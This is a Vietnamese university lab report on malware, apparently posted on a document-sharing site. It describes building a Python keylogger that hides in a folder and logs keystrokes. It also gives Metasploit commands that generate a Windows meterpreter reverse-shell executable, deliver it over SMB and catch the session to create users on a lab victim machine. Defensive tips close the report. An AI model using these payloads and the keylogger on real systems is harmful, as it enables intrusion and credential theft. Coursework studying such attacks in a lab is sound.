Lab 06: Malware | Báo cáo thực hành môn An toàn thông tin khoa công nghê thông tin Trường đại học sư phạm kỹ thuật TP. Hồ Chí Minh

* Định nghĩa: Là một loại phần mềm hoặc thiết bị giám sát và ghi lại mọi phím được ấn trên bàn
phím của máy tính mà nó được cài đặt. Mục đích chính của keylogger là theo dõi hoặc đánh cắp
thông tin mà người dùng nhập vào máy tính mà không được họ biết. Keylogger có thể sử dụng
với các mục đích hợp pháp như việc theo dõi hoạt động của con cái hoặc nhân viên trong môi trường công việc. Tài liệu giúp bạn tham khảo, ôn tập và đạt kết quả cao. Mời bạn đọc đón xem!

11 6 lượt tải Tải xuống
Chia sẻ Báo cáo tài liệu

Môn: An toàn thông tin (INSE330380)

Trường: Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh

Thông tin:

14 trang 6 ngày trước

Tác giả:

Profile Lê Kim Dung
PHẦN 1: KEYLOGGER
* Định nghĩa: một loại phần mềm hoặc thiết bị giám sát ghi lại mọi phím được ấn trên bàn
phím của máy tính được cài đặt. Mục đích chính của keylogger theo dõi hoặc đánh cắp
thông tin người dùng nhập vào máy tính không được họ biết. Keylogger thể sử dụng
với các mục đích hợp pháp như việc theo dõi hoạt động của con cái hoặc nhân viên trong môi
trường công việc. Tuy nhiên, chúng cũng thể được sử dụng bởi tin tặc hoặc người xấu để đánh
cắp thông tin nhân, mật khẩu, thông tin tài khoản ngân hàng, nhiều thông tin quan trọng
khác
* Thực hành: Xây dựng phần mềm theo dõi thao tác của người dùng trên bàn phím, từ đó
đánh cắp thông tin người dùng nhập qua bàn phím.
* Các bước thực hiện:
Bước 1: Trong đĩa C tạo thư mục hack để giấu phần mềm gián điệp
Bước 2: Sau đó ta sẽ để file giandiep.py vào thư mục vừa tạo
Bước 3: Xây dựng file giandiep.py
Bước 3.1: Cài đặt thư viện pynput
Bước 3.2: Gọi thư viện gián điệp Listener để theo dõi thao tác của người dùng trên
máy đây cụ thể từ bàn phím
Bước 3.3: Xây dựng hàm gián điệp lấy thông tin các phím được người dùng rồi
ghi vào file giandiep.txt
Giải thích:
1. Truyền vào tham số key - phím trên bàn phím
2. Sau đó ép kiểu thành kiểu string để ghi được vào file .txt
3. Nếu người dùng bấm F10 thì chương trình gián điệp sẽ dừng lại
4. Nếu không phải phím F10 thì mở file giandiep.txt rồi ghi vào, nếu file chưa thì
sẽ tạo mới rồi ghi thêm vào (tham số ‘a’ viết tắt của appending), truyền thêm tham
số encoding utf-8 để người dùng nhập Tiếng Việt thì phần mềm cũng hiểu
ghi vào file
5. Sau đó viết phím key đã ép kiểu vào file, sau đó đóng file
Bước 4: Chạy hàm đã định nghĩa
Giải thích:
1. Tạo đối tượng Listener truyền tham số key_press hàm đã định nghĩa trên
2. Dùng phương thức start() để bắt đầu lắng nghe
3. Dùng phương thức join() để duy trì quá trình, cho đến khi quá trình hoàn thành
* Kết quả:
PHẦN 2: MALWARE
Bước 1: Xem IP của máy Kali máy Windows XP
Bước 1.1: Vào Command Prompt của Windows XP dùng lệnh ipconfig để định địa
chỉ IP của máy Windows XP.
Bước 1.2: Vào Terminal của Kali dùng lệnh ifconfig để định địa chỉ IP của máy
Kali.
Bước 2: Truy cập vào MSFConsole bằng lệnh msfconsole
1
Bước 3: Tạo virus tên dev.exe, thực hiện ping kết nối 2 máy
Bước 3.1: Dùng lệnh msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.218.132 LPORT=4444 -f exe > /root/dev.exe. Trong đó:
192.168.218.132 địa chỉ ip của máy tính Attacker, 4444 chỉ số port sẽ sử dụng kết
nối với máy nạn nhân.
Bước 3.2: Kiểm tra trong file root của Windows XP, mở thư mục root với quyền
root, thấy thư mục dev.exe virus mình tạo.
Bước 4: Phát tán virus
Bước 4.1: Tạo thư mục 21110600_NTP
Bước 4.2: Cấu hình như sau
Bước 4.3: Máy Attacker, vào smb để chuyển file sang máy nạn nhân
Bước 4.4: Kiểm tra virus dev.exe trong thư mục 21110600_NTP trên Windows XP
Bước 5: Khai thác máy nạn nhân
- Dùng các lệnh
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.136
set LPORT 4444
- Sau đó dùng lệnh: exploit
Xem lệnh đang chạy bằng pháp ps
Tạo thư mục trên máy nạn nhân
Tạo user phân quyền trên máy nạn nhân
PHÒNG CHỐNG CÁC PHẦN MỀM ĐỘC HẠI
1. Cài đặt chương trình duyệt virus
2. Không chạy các chương trình lạ
* Cài đặt chương trình duyệt virus:
Hãy tải cài đặt một phần mềm diệt virus mạnh mẽ đáng tin cậy. Các phần
mềm diệt virus phổ biến bao gồm Avast, McAfee, Norton, hoặc Bitdefender.
Hãy đảm bảo cập nhật thường xuyên để bảo vệ trước các mối đe dọa mới.
Thiết lập chương trình diệt virus để quét toàn bộ hệ thống máy tính của bạn các
đĩa cứng định kỳ.
* Không chạy các chương trình lạ:
Hạn chế cài đặt các phần mềm từ nguồn không tin cậy. Chỉ cài đặt phần mềm từ
các nguồn đáng tin cậy như trang web chính thức của nhà sản xuất hoặc cửa hàng
ứng dụng chính thống.
Tránh mở tệp đính kèm từ email hoặc tin nhắn của người không quen biết.
Hãy luôn cập nhật hệ điều hành các ứng dụng của bạn với phiên bản mới nhất
để bảo vệ khỏi các lỗ hổng bảo mật đã được vá.
Sử dụng tường lửa để ngăn chặn các kết nối không mong muốn đến máy tính
| 1/14
| | Tải xuống

Có thể bạn quan tâm:

Preview text:

PHẦN 1: KEYLOGGER
* Định nghĩa: Là một loại phần mềm hoặc thiết bị giám sát và ghi lại mọi phím được ấn trên bàn
phím của máy tính mà nó được cài đặt. Mục đích chính của keylogger là theo dõi hoặc đánh cắp
thông tin mà người dùng nhập vào máy tính mà không được họ biết. Keylogger có thể sử dụng
với các mục đích hợp pháp như việc theo dõi hoạt động của con cái hoặc nhân viên trong môi
trường công việc. Tuy nhiên, chúng cũng có thể được sử dụng bởi tin tặc hoặc người xấu để đánh
cắp thông tin cá nhân, mật khẩu, thông tin tài khoản ngân hàng, và nhiều thông tin quan trọng khác
* Thực hành: Xây dựng phần mềm theo dõi thao tác của người dùng trên bàn phím, từ đó
đánh cắp thông tin mà người dùng nhập qua bàn phím.
* Các bước thực hiện:
Bước 1: Trong ổ đĩa C tạo thư mục hack để giấu phần mềm gián điệp
Bước 2: Sau đó ta sẽ để file giandiep.py vào thư mục vừa tạo
Bước 3: Xây dựng file giandiep.py
Bước 3.1: Cài đặt thư viện pynput
Bước 3.2: Gọi thư viện gián điệp Listener để theo dõi thao tác của người dùng trên
máy ở đây cụ thể là từ bàn phím
Bước 3.3: Xây dựng hàm gián điệp lấy thông tin các phím được người dùng gõ rồi
ghi vào file giandiep.txt Giải thích:
1. Truyền vào tham số key - là phím trên bàn phím
2. Sau đó ép kiểu thành kiểu string để ghi được vào file .txt
3. Nếu người dùng bấm F10 thì chương trình gián điệp sẽ dừng lại
4. Nếu không phải phím F10 thì mở file giandiep.txt rồi ghi vào, nếu file chưa có thì
sẽ tạo mới rồi ghi thêm vào (tham số ‘a’ viết tắt của appending), truyền thêm tham
số encoding utf-8 để người dùng có nhập Tiếng Việt thì phần mềm cũng hiểu mà ghi vào file
5. Sau đó viết phím key đã ép kiểu vào file, sau đó đóng file
Bước 4: Chạy hàm đã định nghĩa Giải thích:
1. Tạo đối tượng Listener truyền tham số key_press là hàm đã định nghĩa ở trên
2. Dùng phương thức start() để bắt đầu lắng nghe
3. Dùng phương thức join() để duy trì quá trình, cho đến khi quá trình hoàn thành * Kết quả: PHẦN 2: MALWARE
Bước 1: Xem IP của máy Kali và máy Windows XP
Bước 1.1: Vào Command Prompt của Windows XP dùng lệnh ipconfig để định địa
chỉ IP của máy Windows XP.
Bước 1.2: Vào Terminal của Kali dùng lệnh ifconfig để định địa chỉ IP của máy Kali.
Bước 2: Truy cập vào MSFConsole bằng lệnh msfconsole 1
Bước 3: Tạo virus có tên dev.exe, thực hiện ping kết nối 2 máy
Bước 3.1: Dùng lệnh msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.218.132 LPORT=4444 -f exe > /root/dev.exe. Trong đó:
192.168.218.132 là địa chỉ ip của máy tính Attacker, 4444 là chỉ số port sẽ sử dụng kết nối với máy nạn nhân.
Bước 3.2: Kiểm tra trong file root của Windows XP, mở thư mục root với quyền
root, thấy thư mục dev.exe là virus mình tạo. Bước 4: Phát tán virus
Bước 4.1: Tạo thư mục 21110600_NTP
Bước 4.2: Cấu hình như sau
Bước 4.3: Máy Attacker, vào smb để chuyển file sang máy nạn nhân
Bước 4.4: Kiểm tra virus dev.exe trong thư mục 21110600_NTP trên Windows XP
Bước 5: Khai thác máy nạn nhân - Dùng các lệnh
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.2.136 set LPORT 4444
- Sau đó dùng lệnh: exploit
Xem lệnh đang chạy bằng cú pháp ps
Tạo thư mục trên máy nạn nhân
Tạo user phân quyền trên máy nạn nhân
PHÒNG CHỐNG CÁC PHẦN MỀM ĐỘC HẠI
1. Cài đặt chương trình duyệt virus
2. Không chạy các chương trình lạ
* Cài đặt chương trình duyệt virus:
Hãy tải và cài đặt một phần mềm diệt virus mạnh mẽ và đáng tin cậy. Các phần
mềm diệt virus phổ biến bao gồm Avast, McAfee, Norton, hoặc Bitdefender.
Hãy đảm bảo cập nhật thường xuyên để bảo vệ trước các mối đe dọa mới.
Thiết lập chương trình diệt virus để quét toàn bộ hệ thống máy tính của bạn và các ổ đĩa cứng định kỳ.
* Không chạy các chương trình lạ:
Hạn chế cài đặt các phần mềm từ nguồn không tin cậy. Chỉ cài đặt phần mềm từ
các nguồn đáng tin cậy như trang web chính thức của nhà sản xuất hoặc cửa hàng ứng dụng chính thống.
Tránh mở tệp đính kèm từ email hoặc tin nhắn của người không quen biết.
Hãy luôn cập nhật hệ điều hành và các ứng dụng của bạn với phiên bản mới nhất
để bảo vệ khỏi các lỗ hổng bảo mật đã được vá.
Sử dụng tường lửa để ngăn chặn các kết nối không mong muốn đến máy tính